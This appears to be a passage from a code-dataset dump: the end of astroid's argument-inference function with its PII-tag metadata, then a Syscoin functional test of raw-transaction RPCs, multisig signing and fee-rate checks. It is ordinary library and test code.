arg=name, + context=context, + ) + + # Look into the keywords first, maybe it's already there. + try: + return self.keyword_arguments[name].infer(context) + except KeyError: + pass + + # Too many arguments given and no variable arguments. + if len(self.positional_arguments) > len(funcnode.args.args): + if not funcnode.args.vararg and not funcnode.args.posonlyargs: + raise exceptions.InferenceError( + ""Too many positional arguments "" + ""passed to {func!r} that does "" + ""not have *args."", + call_site=self, + func=funcnode, + arg=name, + context=context, + ) + + positional = self.positional_arguments[: len(funcnode.args.args)] + vararg = self.positional_arguments[len(funcnode.args.args) :] + argindex = funcnode.args.find_argname(name)[0] + kwonlyargs = {arg.name for arg in funcnode.args.kwonlyargs} + kwargs = { + key: value + for key, value in self.keyword_arguments.items() + if key not in kwonlyargs + } + # If there are too few positionals compared to + # what the function expects to receive, check to see + # if the missing positional arguments were passed + # as keyword arguments and if so, place them into the + # positional args list. + if len(positional) < len(funcnode.args.args): + for func_arg in funcnode.args.args: + if func_arg.name in kwargs: + arg = kwargs.pop(func_arg.name) + positional.append(arg) + + if argindex is not None: + # 2. first argument of instance/class method + if argindex == 0 and funcnode.type in (""method"", ""classmethod""): + if context.boundnode is not None: + boundnode = context.boundnode + else: + # XXX can do better ? + boundnode = funcnode.parent.frame() + + if isinstance(boundnode, nodes.ClassDef): + # Verify that we're accessing a method + # of the metaclass through a class, as in + # `cls.metaclass_method`. In this case, the + # first argument is always the class. + method_scope = funcnode.parent.scope() + if method_scope is boundnode.metaclass(): + return iter((boundnode,)) + + if funcnode.type == ""method"": + if not isinstance(boundnode, bases.Instance): + boundnode = boundnode.instantiate_class() + return iter((boundnode,)) + if funcnode.type == ""classmethod"": + return iter((boundnode,)) + # if we have a method, extract one position + # from the index, so we'll take in account + # the extra parameter represented by `self` or `cls` + if funcnode.type in (""method"", ""classmethod""): + argindex -= 1 + # 2. search arg index + try: + return self.positional_arguments[argindex].infer(context) + except IndexError: + pass + + if funcnode.args.kwarg == name: + # It wants all the keywords that were passed into + # the call site. + if self.has_invalid_keywords(): + raise exceptions.InferenceError( + ""Inference failed to find values for all keyword arguments "" + ""to {func!r}: {unpacked_kwargs!r} doesn't correspond to "" + ""{keyword_arguments!r}."", + keyword_arguments=self.keyword_arguments, + unpacked_kwargs=self._unpacked_kwargs, + call_site=self, + func=funcnode, + arg=name, + context=context, + ) + kwarg = nodes.Dict( + lineno=funcnode.args.lineno, + col_offset=funcnode.args.col_offset, + parent=funcnode.args, + ) + kwarg.postinit( + [(nodes.const_factory(key), value) for key, value in kwargs.items()] + ) + return iter((kwarg,)) + if funcnode.args.vararg == name: + # It wants all the args that were passed into + # the call site. + if self.has_invalid_arguments(): + raise exceptions.InferenceError( + ""Inference failed to find values for all positional "" + ""arguments to {func!r}: {unpacked_args!r} doesn't "" + ""correspond to {positional_arguments!r}."", + positional_arguments=self.positional_arguments, + unpacked_args=self._unpacked_args, + call_site=self, + func=funcnode, + arg=name, + context=context, + ) + args = nodes.Tuple( + lineno=funcnode.args.lineno, + col_offset=funcnode.args.col_offset, + parent=funcnode.args, + ) + args.postinit(vararg) + return iter((args,)) + + # Check if it's a default parameter. + try: + return funcnode.args.default_value(name).infer(context) + except exceptions.NoDefault: + pass + raise exceptions.InferenceError( + ""No value found for argument {arg} to {func!r}"", + call_site=self, + func=funcnode, + arg=name, + context=context, + ) +",12599,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015-2016'], ['DATE_TIME', '2018-2020'], ['PERSON', 'Claudiu Popa'], ['DATE_TIME', '2015-2016'], ['PERSON', 'Ceridwen'], ['PERSON', 'Nick Drozd'], ['PERSON', 'Anthony Sottile'], ['DATE_TIME', '2020'], ['PERSON', 'hippo91'], ['DATE_TIME', '2021'], ['PERSON', 'Pierre Sassoulas'], ['PERSON', 'callcontext = contextmod'], ['PERSON', 'kwonlyargs'], ['PERSON', 'boundnode'], ['PERSON', 'boundnode'], ['PERSON', 'lineno=funcnode.args.lineno'], ['PERSON', 'lineno=funcnode.args.lineno'], ['URL', 'https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html'], ['URL', 'https://github.com/PyCQA/astroid/blob/master/LICENSE'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'astroid.context.Ca'], ['URL', 'astroid.context.Co'], ['URL', 'astroid.context.Co'], ['URL', 'self.ar'], ['URL', 'callcontext.ar'], ['URL', 'callcontext.ke'], ['URL', 'self.ke'], ['URL', 'kwargs.it'], ['URL', 'astroid.context.Co'], ['URL', 'contextmod.In'], ['URL', 'contextmod.Ca'], ['URL', 'node.ar'], ['URL', 'node.ke'], ['URL', 'self.ke'], ['URL', 'contextmod.In'], ['URL', 'self.ar'], ['URL', 'value.in'], ['URL', 'exceptions.In'], ['URL', 'inferred.it'], ['URL', 'key.in'], ['URL', 'exceptions.In'], ['URL', 'nodes.Co'], ['URL', 'key.va'], ['URL', 'key.va'], ['URL', 'key.va'], ['URL', 'keywords.ad'], ['URL', 'key.va'], ['URL', 'key.va'], ['URL', 'contextmod.In'], ['URL', 'self.ar'], ['URL', 'nodes.St'], ['URL', 'arg.value.in'], ['URL', 'exceptions.In'], ['URL', 'exceptions.In'], ['URL', 'self.ke'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.va'], ['URL', 'funcnode.ar'], ['URL', 'exceptions.In'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.fi'], ['URL', 'arg.na'], ['URL', 'funcnode.args.kw'], ['URL', 'self.ke'], ['URL', 'arguments.it'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.ar'], ['URL', 'arg.na'], ['URL', 'arg.na'], ['URL', 'context.bo'], ['URL', 'context.bo'], ['URL', 'funcnode.parent.fr'], ['URL', 'nodes.Cl'], ['URL', 'cls.me'], ['URL', 'funcnode.parent.sc'], ['URL', 'boundnode.me'], ['URL', 'bases.In'], ['URL', 'boundnode.in'], ['URL', 'funcnode.args.kw'], ['URL', 'exceptions.In'], ['URL', 'self.ke'], ['URL', 'funcnode.args.li'], ['URL', 'funcnode.args.co'], ['URL', 'funcnode.ar'], ['URL', 'nodes.co'], ['URL', 'kwargs.it'], ['URL', 'funcnode.args.va'], ['URL', 'exceptions.In'], ['URL', 'funcnode.args.li'], ['URL', 'funcnode.args.co'], ['URL', 'funcnode.ar'], ['URL', 'funcnode.args.de'], ['URL', 'exceptions.No'], ['URL', 'exceptions.In']]" +76,"#!/usr/bin/env python3 +# Copyright (c) 2014-2020 The Bitcoin Core developers +# Distributed under the MIT software license, see the accompanying +# file COPYING or http://www.opensource.org/licenses/mit-license.php. +""""""Test the rawtransaction RPCs. + +Test the following RPCs: + - createrawtransaction + - signrawtransactionwithwallet + - sendrawtransaction + - decoderawtransaction + - getrawtransaction +"""""" + +from collections import OrderedDict +from decimal import Decimal +from io import BytesIO +from test_framework.messages import CTransaction, ToHex +from test_framework.test_framework import SyscoinTestFramework +from test_framework.util import ( + assert_equal, + assert_raises_rpc_error, + find_vout_for_address, + hex_str_to_bytes, +) + + +class multidict(dict): + """"""Dictionary that allows duplicate keys. + + Constructed with a list of (key, value) tuples. When dumped by the json module, + will output invalid json with repeated keys, eg: + >>> json.dumps(multidict([(1,2),(1,2)]) + '{""1"": 2, ""1"": 2}' + + Used to test calls to rpc methods with repeated keys in the json object."""""" + + def __init__(self, x): + dict.__init__(self, x) + self.x = x + + def items(self): + return self.x + + +# Create one-input, one-output, no-fee transaction: +class RawTransactionsTest(SyscoinTestFramework): + def set_test_params(self): + self.setup_clean_chain = True + self.num_nodes = 3 + self.extra_args = [ + [""-txindex""], + [""-txindex""], + [""-txindex""], + ] + self.supports_cli = False + + def skip_test_if_missing_module(self): + self.skip_if_no_wallet() + + def setup_network(self): + super().setup_network() + self.connect_nodes(0, 2) + + def run_test(self): + self.log.info('prepare some coins for multiple *rawtransaction commands') + self.nodes[2].generate(1) + self.sync_all() + self.nodes[0].generate(101) + self.sync_all() + self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.5) + self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.0) + self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),5.0) + self.sync_all() + self.nodes[0].generate(5) + self.sync_all() + + self.log.info('Test getrawtransaction on genesis block coinbase returns an error') + block = self.nodes[0].getblock(self.nodes[0].getblockhash(0)) + assert_raises_rpc_error(-5, ""The genesis block coinbase is not considered an ordinary transaction"", self.nodes[0].getrawtransaction, block['merkleroot']) + + self.log.info('Check parameter types and required parameters of createrawtransaction') + # Test `createrawtransaction` required parameters + assert_raises_rpc_error(-1, ""createrawtransaction"", self.nodes[0].createrawtransaction) + assert_raises_rpc_error(-1, ""createrawtransaction"", self.nodes[0].createrawtransaction, []) + + # Test `createrawtransaction` invalid extra parameters + assert_raises_rpc_error(-1, ""createrawtransaction"", self.nodes[0].createrawtransaction, [], {}, 0, False, 'foo') + + # Test `createrawtransaction` invalid `inputs` + txid = 'PI:KEY' + assert_raises_rpc_error(-3, ""Expected type array"", self.nodes[0].createrawtransaction, 'foo', {}) + assert_raises_rpc_error(-1, ""JSON value is not an object as expected"", self.nodes[0].createrawtransaction, ['foo'], {}) + assert_raises_rpc_error(-1, ""JSON value is not a string as expected"", self.nodes[0].createrawtransaction, [{}], {}) + assert_raises_rpc_error(-8, ""txid must be of length 64 (not 3, for 'foo')"", self.nodes[0].createrawtransaction, [{'txid': 'foo'}], {}) + assert_raises_rpc_error(-8, ""txid must be hexadecimal string (not 'PI:KEY')"", self.nodes[0].createrawtransaction, [{'txid': 'PI:KEY'}], {}) + assert_raises_rpc_error(-8, ""Invalid parameter, missing vout key"", self.nodes[0].createrawtransaction, [{'txid': txid}], {}) + assert_raises_rpc_error(-8, ""Invalid parameter, missing vout key"", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': 'foo'}], {}) + assert_raises_rpc_error(-8, ""Invalid parameter, vout cannot be negative"", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': -1}], {}) + assert_raises_rpc_error(-8, ""Invalid parameter, sequence number is out of range"", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': 0, 'sequence': -1}], {}) + + # Test `createrawtransaction` invalid `outputs` + address = self.nodes[0].getnewaddress() + address2 = self.nodes[0].getnewaddress() + assert_raises_rpc_error(-1, ""JSON value is not an array as expected"", self.nodes[0].createrawtransaction, [], 'foo') + self.nodes[0].createrawtransaction(inputs=[], outputs={}) # Should not throw for backwards compatibility + self.nodes[0].createrawtransaction(inputs=[], outputs=[]) + assert_raises_rpc_error(-8, ""Data must be hexadecimal string"", self.nodes[0].createrawtransaction, [], {'data': 'foo'}) + assert_raises_rpc_error(-5, ""Invalid Syscoin address"", self.nodes[0].createrawtransaction, [], {'foo': 0}) + assert_raises_rpc_error(-3, ""Invalid amount"", self.nodes[0].createrawtransaction, [], {address: 'foo'}) + assert_raises_rpc_error(-3, ""Amount out of range"", self.nodes[0].createrawtransaction, [], {address: -1}) + assert_raises_rpc_error(-8, ""Invalid parameter, duplicated address: %s"" % address, self.nodes[0].createrawtransaction, [], multidict([(address, 1), (address, 1)])) + assert_raises_rpc_error(-8, ""Invalid parameter, duplicated address: %s"" % address, self.nodes[0].createrawtransaction, [], [{address: 1}, {address: 1}]) + assert_raises_rpc_error(-8, ""Invalid parameter, duplicate key: data"", self.nodes[0].createrawtransaction, [], [{""data"": 'aa'}, {""data"": ""bb""}]) + assert_raises_rpc_error(-8, ""Invalid parameter, duplicate key: data"", self.nodes[0].createrawtransaction, [], multidict([(""data"", 'aa'), (""data"", ""bb"")])) + assert_raises_rpc_error(-8, ""Invalid parameter, key-value pair must contain exactly one key"", self.nodes[0].createrawtransaction, [], [{'a': 1, 'b': 2}]) + assert_raises_rpc_error(-8, ""Invalid parameter, key-value pair not an object as expected"", self.nodes[0].createrawtransaction, [], [['key-value pair1'], ['2']]) + + # Test `createrawtransaction` invalid `locktime` + assert_raises_rpc_error(-3, ""Expected type number"", self.nodes[0].createrawtransaction, [], {}, 'foo') + assert_raises_rpc_error(-8, ""Invalid parameter, locktime out of range"", self.nodes[0].createrawtransaction, [], {}, -1) + assert_raises_rpc_error(-8, ""Invalid parameter, locktime out of range"", self.nodes[0].createrawtransaction, [], {}, 4294967296) + + # Test `createrawtransaction` invalid `replaceable` + assert_raises_rpc_error(-3, ""Expected type bool"", self.nodes[0].createrawtransaction, [], {}, 0, 'foo') + + self.log.info('Check that createrawtransaction accepts an array and object as outputs') + tx = CTransaction() + # One output + tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs={address: 99})))) + assert_equal(len(tx.vout), 1) + assert_equal( + tx.serialize().hex(), + self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}]), + ) + # Two outputs + tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=OrderedDict([(address, 99), (address2, 99)]))))) + assert_equal(len(tx.vout), 2) + assert_equal( + tx.serialize().hex(), + self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}, {address2: 99}]), + ) + # Multiple mixed outputs + tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=multidict([(address, 99), (address2, 99), ('data', '99')]))))) + assert_equal(len(tx.vout), 3) + assert_equal( + tx.serialize().hex(), + self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}, {address2: 99}, {'data': '99'}]), + ) + + for type in [""bech32"", ""p2sh-segwit"", ""legacy""]: + addr = self.nodes[0].getnewaddress("""", type) + addrinfo = self.nodes[0].getaddressinfo(addr) + pubkey = addrinfo[""scriptPubKey""] + + self.log.info('sendrawtransaction with missing prevtx info (%s)' %(type)) + + # Test `signrawtransactionwithwallet` invalid `prevtxs` + inputs = [ {'txid' : txid, 'vout' : 3, 'sequence' : 1000}] + outputs = { self.nodes[0].getnewaddress() : 1 } + rawtx = self.nodes[0].createrawtransaction(inputs, outputs) + + prevtx = dict(txid=txid, scriptPubKey=pubkey, vout=3, amount=1) + succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx]) + assert succ[""complete""] + if type == ""legacy"": + del prevtx[""amount""] + succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx]) + assert succ[""complete""] + + if type != ""legacy"": + assert_raises_rpc_error(-3, ""Missing amount"", self.nodes[0].signrawtransactionwithwallet, rawtx, [ + { + ""txid"": txid, + ""scriptPubKey"": pubkey, + ""vout"": 3, + } + ]) + + assert_raises_rpc_error(-3, ""Missing vout"", self.nodes[0].signrawtransactionwithwallet, rawtx, [ + { + ""txid"": txid, + ""scriptPubKey"": pubkey, + ""amount"": 1, + } + ]) + assert_raises_rpc_error(-3, ""Missing txid"", self.nodes[0].signrawtransactionwithwallet, rawtx, [ + { + ""scriptPubKey"": pubkey, + ""vout"": 3, + ""amount"": 1, + } + ]) + assert_raises_rpc_error(-3, ""Missing scriptPubKey"", self.nodes[0].signrawtransactionwithwallet, rawtx, [ + { + ""txid"": txid, + ""vout"": 3, + ""amount"": 1 + } + ]) + + ######################################### + # sendrawtransaction with missing input # + ######################################### + + self.log.info('sendrawtransaction with missing input') + inputs = [ {'txid' : ""PI:KEY"", 'vout' : 1}] #won't exists + outputs = { self.nodes[0].getnewaddress() : 4.998 } + rawtx = self.nodes[2].createrawtransaction(inputs, outputs) + rawtx = self.nodes[2].signrawtransactionwithwallet(rawtx) + + # This will raise an exception since there are missing inputs + assert_raises_rpc_error(-25, ""bad-txns-inputs-missingorspent"", self.nodes[2].sendrawtransaction, rawtx['hex']) + + ##################################### + # getrawtransaction with block hash # + ##################################### + + # make a tx by sending then generate 2 blocks; block1 has the tx in it + tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress(), 1) + block1, block2 = self.nodes[2].generate(2) + self.sync_all() + # We should be able to get the raw transaction by providing the correct block + gottx = self.nodes[0].getrawtransaction(tx, True, block1) + assert_equal(gottx['txid'], tx) + assert_equal(gottx['in_active_chain'], True) + # We should have the 'in_active_chain' flag when we don't provide a block due to blockindexdb + gottx = self.nodes[0].getrawtransaction(tx, True) + assert_equal(gottx['txid'], tx) + # SYSCOIN + assert 'in_active_chain' in gottx + # We should not get the tx if we provide an unrelated block + assert_raises_rpc_error(-5, ""No such transaction found"", self.nodes[0].getrawtransaction, tx, True, block2) + # An invalid block hash should raise the correct errors + assert_raises_rpc_error(-1, ""JSON value is not a string as expected"", self.nodes[0].getrawtransaction, tx, True, True) + assert_raises_rpc_error(-8, ""parameter 3 must be of length 64 (not 6, for 'foobar')"", self.nodes[0].getrawtransaction, tx, True, ""foobar"") + assert_raises_rpc_error(-8, ""parameter 3 must be of length 64 (not 8, for 'abcd1234')"", self.nodes[0].getrawtransaction, tx, True, ""abcd1234"") + assert_raises_rpc_error(-8, ""parameter 3 must be hexadecimal string (not 'ZZZ0000000000000000000000000000000000000000000000000000000000000')"", self.nodes[0].getrawtransaction, tx, True, ""ZZZ0000000000000000000000000000000000000000000000000000000000000"") + assert_raises_rpc_error(-5, ""Block hash not found"", self.nodes[0].getrawtransaction, tx, True, ""0000000000000000000000000000000000000000000000000000000000000000"") + # Undo the blocks and check in_active_chain + self.nodes[0].invalidateblock(block1) + gottx = self.nodes[0].getrawtransaction(txid=tx, verbose=True, blockhash=block1) + assert_equal(gottx['in_active_chain'], False) + self.nodes[0].reconsiderblock(block1) + assert_equal(self.nodes[0].getbestblockhash(), block2) + + if not self.options.descriptors: + # The traditional multisig workflow does not work with descriptor wallets so these are legacy only. + # The multisig workflow with descriptor wallets uses PSBTs and is tested elsewhere, no need to do them here. + ######################### + # RAW TX MULTISIG TESTS # + ######################### + # 2of2 test + addr1 = self.nodes[2].getnewaddress() + addr2 = self.nodes[2].getnewaddress() + + addr1Obj = self.nodes[2].getaddressinfo(addr1) + addr2Obj = self.nodes[2].getaddressinfo(addr2) + + # Tests for createmultisig and addmultisigaddress + assert_raises_rpc_error(-5, ""Invalid public key"", self.nodes[0].createmultisig, 1, [""01020304""]) + self.nodes[0].createmultisig(2, [addr1Obj['pubkey'], addr2Obj['pubkey']]) # createmultisig can only take public keys + assert_raises_rpc_error(-5, ""Invalid public key"", self.nodes[0].createmultisig, 2, [addr1Obj['pubkey'], addr1]) # addmultisigaddress can take both pubkeys and addresses so long as they are in the wallet, which is tested here. + + mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr1])['address'] + + #use balance deltas instead of absolute values + bal = self.nodes[2].getbalance() + + # send 1.2 SYS to msig adr + txId = self.nodes[0].sendtoaddress(mSigObj, 1.2) + self.sync_all() + self.nodes[0].generate(1) + self.sync_all() + assert_equal(self.nodes[2].getbalance(), bal+Decimal('1.20000000')) #node2 has both keys of the 2of2 ms addr., tx should affect the balance + + + # 2of3 test from different nodes + bal = self.nodes[2].getbalance() + addr1 = self.nodes[1].getnewaddress() + addr2 = self.nodes[2].getnewaddress() + addr3 = self.nodes[2].getnewaddress() + + addr1Obj = self.nodes[1].getaddressinfo(addr1) + addr2Obj = self.nodes[2].getaddressinfo(addr2) + addr3Obj = self.nodes[2].getaddressinfo(addr3) + + mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey']])['address'] + + txId = self.nodes[0].sendtoaddress(mSigObj, 2.2) + decTx = self.nodes[0].gettransaction(txId) + rawTx = self.nodes[0].decoderawtransaction(decTx['hex']) + self.sync_all() + self.nodes[0].generate(1) + self.sync_all() + + #THIS IS AN INCOMPLETE FEATURE + #NODE2 HAS TWO OF THREE KEY AND THE FUNDS SHOULD BE SPENDABLE AND COUNT AT BALANCE CALCULATION + assert_equal(self.nodes[2].getbalance(), bal) #for now, assume the funds of a 2of3 multisig tx are not marked as spendable + + txDetails = self.nodes[0].gettransaction(txId, True) + rawTx = self.nodes[0].decoderawtransaction(txDetails['hex']) + vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('2.20000000')) + + bal = self.nodes[0].getbalance() + inputs = [{ ""txid"" : txId, ""vout"" : vout['n'], ""scriptPubKey"" : vout['scriptPubKey']['hex'], ""amount"" : vout['value']}] + outputs = { self.nodes[0].getnewaddress() : 2.19 } + rawTx = self.nodes[2].createrawtransaction(inputs, outputs) + rawTxPartialSigned = self.nodes[1].signrawtransactionwithwallet(rawTx, inputs) + assert_equal(rawTxPartialSigned['complete'], False) #node1 only has one key, can't comp. sign the tx + + rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx, inputs) + assert_equal(rawTxSigned['complete'], True) #node2 can sign the tx compl., own two of three keys + self.nodes[2].sendrawtransaction(rawTxSigned['hex']) + rawTx = self.nodes[0].decoderawtransaction(rawTxSigned['hex']) + self.sync_all() + self.nodes[0].generate(1) + self.sync_all() + assert_equal(self.nodes[0].getbalance(), bal+Decimal('50.00000000')+Decimal('2.19000000')) #block reward + tx + + # 2of2 test for combining transactions + bal = self.nodes[2].getbalance() + addr1 = self.nodes[1].getnewaddress() + addr2 = self.nodes[2].getnewaddress() + + addr1Obj = self.nodes[1].getaddressinfo(addr1) + addr2Obj = self.nodes[2].getaddressinfo(addr2) + + self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address'] + mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address'] + mSigObjValid = self.nodes[2].getaddressinfo(mSigObj) + + txId = self.nodes[0].sendtoaddress(mSigObj, 2.2) + decTx = self.nodes[0].gettransaction(txId) + rawTx2 = self.nodes[0].decoderawtransaction(decTx['hex']) + self.sync_all() + self.nodes[0].generate(1) + self.sync_all() + + assert_equal(self.nodes[2].getbalance(), bal) # the funds of a 2of2 multisig tx should not be marked as spendable + + txDetails = self.nodes[0].gettransaction(txId, True) + rawTx2 = self.nodes[0].decoderawtransaction(txDetails['hex']) + vout = next(o for o in rawTx2['vout'] if o['value'] == Decimal('2.20000000')) + + bal = self.nodes[0].getbalance() + inputs = [{ ""txid"" : txId, ""vout"" : vout['n'], ""scriptPubKey"" : vout['scriptPubKey']['hex'], ""redeemScript"" : mSigObjValid['hex'], ""amount"" : vout['value']}] + outputs = { self.nodes[0].getnewaddress() : 2.19 } + rawTx2 = self.nodes[2].createrawtransaction(inputs, outputs) + rawTxPartialSigned1 = self.nodes[1].signrawtransactionwithwallet(rawTx2, inputs) + self.log.debug(rawTxPartialSigned1) + assert_equal(rawTxPartialSigned1['complete'], False) #node1 only has one key, can't comp. sign the tx + + rawTxPartialSigned2 = self.nodes[2].signrawtransactionwithwallet(rawTx2, inputs) + self.log.debug(rawTxPartialSigned2) + assert_equal(rawTxPartialSigned2['complete'], False) #node2 only has one key, can't comp. sign the tx + rawTxComb = self.nodes[2].combinerawtransaction([rawTxPartialSigned1['hex'], rawTxPartialSigned2['hex']]) + self.log.debug(rawTxComb) + self.nodes[2].sendrawtransaction(rawTxComb) + rawTx2 = self.nodes[0].decoderawtransaction(rawTxComb) + self.sync_all() + self.nodes[0].generate(1) + self.sync_all() + assert_equal(self.nodes[0].getbalance(), bal+Decimal('50.00000000')+Decimal('2.19000000')) #block reward + tx + + # decoderawtransaction tests + # witness transaction + encrawtx = ""PI:KEY"" + decrawtx = self.nodes[0].decoderawtransaction(encrawtx, True) # decode as witness transaction + assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000')) + assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # force decode as non-witness transaction + # non-witness transaction + encrawtx = ""PI:KEY"" + decrawtx = self.nodes[0].decoderawtransaction(encrawtx, False) # decode as non-witness transaction + assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000')) + # known ambiguous transaction in the chain (see https://github.com/bitcoin/bitcoin/issues/20579) + encrawtx = ""PI:KEY"" + decrawtx = self.nodes[0].decoderawtransaction(encrawtx) + decrawtx_wit = self.nodes[0].decoderawtransaction(encrawtx, True) + assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # fails to decode as non-witness transaction + assert_equal(decrawtx, decrawtx_wit) # the witness interpretation should be chosen + assert_equal(decrawtx['vin'][0]['coinbase'], ""PI:KEY"") + + # Basic signrawtransaction test + addr = self.nodes[1].getnewaddress() + txid = self.nodes[0].sendtoaddress(addr, 10) + self.nodes[0].generate(1) + self.sync_all() + vout = find_vout_for_address(self.nodes[1], txid, addr) + rawTx = self.nodes[1].createrawtransaction([{'txid': txid, 'vout': vout}], {self.nodes[1].getnewaddress(): 9.999}) + rawTxSigned = self.nodes[1].signrawtransactionwithwallet(rawTx) + txId = self.nodes[1].sendrawtransaction(rawTxSigned['hex']) + self.nodes[0].generate(1) + self.sync_all() + + # getrawtransaction tests + # 1. valid parameters - only supply txid + assert_equal(self.nodes[0].getrawtransaction(txId), rawTxSigned['hex']) + + # 2. valid parameters - supply txid and 0 for non-verbose + assert_equal(self.nodes[0].getrawtransaction(txId, 0), rawTxSigned['hex']) + + # 3. valid parameters - supply txid and False for non-verbose + assert_equal(self.nodes[0].getrawtransaction(txId, False), rawTxSigned['hex']) + + # 4. valid parameters - supply txid and 1 for verbose. + # We only check the ""hex"" field of the output so we don't need to update this test every time the output format changes. + assert_equal(self.nodes[0].getrawtransaction(txId, 1)[""hex""], rawTxSigned['hex']) + + # 5. valid parameters - supply txid and True for non-verbose + assert_equal(self.nodes[0].getrawtransaction(txId, True)[""hex""], rawTxSigned['hex']) + + # 6. invalid parameters - supply txid and string ""Flase"" + assert_raises_rpc_error(-1, ""not a boolean"", self.nodes[0].getrawtransaction, txId, ""Flase"") + + # 7. invalid parameters - supply txid and empty array + assert_raises_rpc_error(-1, ""not a boolean"", self.nodes[0].getrawtransaction, txId, []) + + # 8. invalid parameters - supply txid and empty dict + assert_raises_rpc_error(-1, ""not a boolean"", self.nodes[0].getrawtransaction, txId, {}) + + inputs = [ {'txid' : ""PI:KEY"", 'vout' : 1, 'sequence' : 1000}] + outputs = { self.nodes[0].getnewaddress() : 1 } + rawtx = self.nodes[0].createrawtransaction(inputs, outputs) + decrawtx= self.nodes[0].decoderawtransaction(rawtx) + assert_equal(decrawtx['vin'][0]['sequence'], 1000) + + # 9. invalid parameters - sequence number out of range + inputs = [ {'txid' : ""PI:KEY"", 'vout' : 1, 'sequence' : -1}] + outputs = { self.nodes[0].getnewaddress() : 1 } + assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range', self.nodes[0].createrawtransaction, inputs, outputs) + + # 10. invalid parameters - sequence number out of range + inputs = [ {'txid' : ""PI:KEY"", 'vout' : 1, 'sequence' : 4294967296}] + outputs = { self.nodes[0].getnewaddress() : 1 } + assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range', self.nodes[0].createrawtransaction, inputs, outputs) + + inputs = [ {'txid' : ""PI:KEY"", 'vout' : 1, 'sequence' : 4294967294}] + outputs = { self.nodes[0].getnewaddress() : 1 } + rawtx = self.nodes[0].createrawtransaction(inputs, outputs) + decrawtx= self.nodes[0].decoderawtransaction(rawtx) + assert_equal(decrawtx['vin'][0]['sequence'], 4294967294) + + #################################### + # TRANSACTION VERSION NUMBER TESTS # + #################################### + + # Test the minimum transaction version number that fits in a signed 32-bit integer. + # As transaction version is unsigned, this should convert to its unsigned equivalent. + tx = CTransaction() + tx.nVersion = -0x80000000 + rawtx = ToHex(tx) + decrawtx = self.nodes[0].decoderawtransaction(rawtx) + assert_equal(decrawtx['version'], 0x80000000) + + # Test the maximum transaction version number that fits in a signed 32-bit integer. + tx = CTransaction() + tx.nVersion = 0x7fffffff + rawtx = ToHex(tx) + decrawtx = self.nodes[0].decoderawtransaction(rawtx) + assert_equal(decrawtx['version'], 0x7fffffff) + + self.log.info('sendrawtransaction/testmempoolaccept with maxfeerate') + + # Test a transaction with a small fee. + txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0) + rawTx = self.nodes[0].getrawtransaction(txId, True) + vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000')) + + self.sync_all() + inputs = [{ ""txid"" : txId, ""vout"" : vout['n'] }] + # Fee 10,000 satoshis, (1 - (10000 sat * 0.00000001 SYS/sat)) = 0.9999 + outputs = { self.nodes[0].getnewaddress() : Decimal(""0.99990000"") } + rawTx = self.nodes[2].createrawtransaction(inputs, outputs) + rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx) + assert_equal(rawTxSigned['complete'], True) + # Fee 10,000 satoshis, ~100 b transaction, fee rate should land around 100 sat/byte = 0.00100000 SYS/kB + # Thus, testmempoolaccept should reject + testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']], 0.00001000)[0] + assert_equal(testres['allowed'], False) + assert_equal(testres['reject-reason'], 'max-fee-exceeded') + # and sendrawtransaction should throw + assert_raises_rpc_error(-25, 'Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)', self.nodes[2].sendrawtransaction, rawTxSigned['hex'], 0.00001000) + # and the following calls should both succeed + testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']])[0] + 